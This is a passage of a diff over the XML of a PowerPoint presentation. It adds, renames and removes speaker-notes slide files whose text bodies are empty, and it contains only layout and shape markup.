+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF8F337-7DE1-1854-0BAF-C04706A91970}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3717877283"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide35.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57DB1149-E4CB-7FEB-1517-A551B50D5EA9}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E40AE6-B57F-54D0-2E2A-9F5C78E0705A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39C2FD8-0122-5768-25A4-7929F52B9365}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1835031689"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide36.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396363CC-6970-756F-8E27-A63D8C9C133C}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED03EBF-A3D9-6DEF-6AAB-8E2AB042EB35}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B000EADD-7EBA-DA44-F2BF-7D3CD8F675A6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="516102974"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide37.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510FDA05-D309-794B-1448-C950019C5779}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE905B57-6C75-64D3-6882-D52B44689366}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4159158-3C56-4FEE-6871-1301127D3FA1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4154448130"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide38.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2987C4B5-9791-F752-496A-FC6655DF675A}"/>
             </a:ext>
           </a:extLst>
@@ -3799,7 +4824,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide31.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3926,214 +4951,6 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide32.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 115"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide33.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 166"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
 <file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
@@ -4195,6 +5012,341 @@
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide40.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26ABB8DB-17A6-1859-2F61-9B5776819772}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF8D77B4-7B1E-C71B-2553-7CEEF2B2F4DE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80186D76-62C8-4D3D-750D-DC379EE66DFE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1777224992"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide41.xml><?xml version="1.0" encoding="utf-8"?>
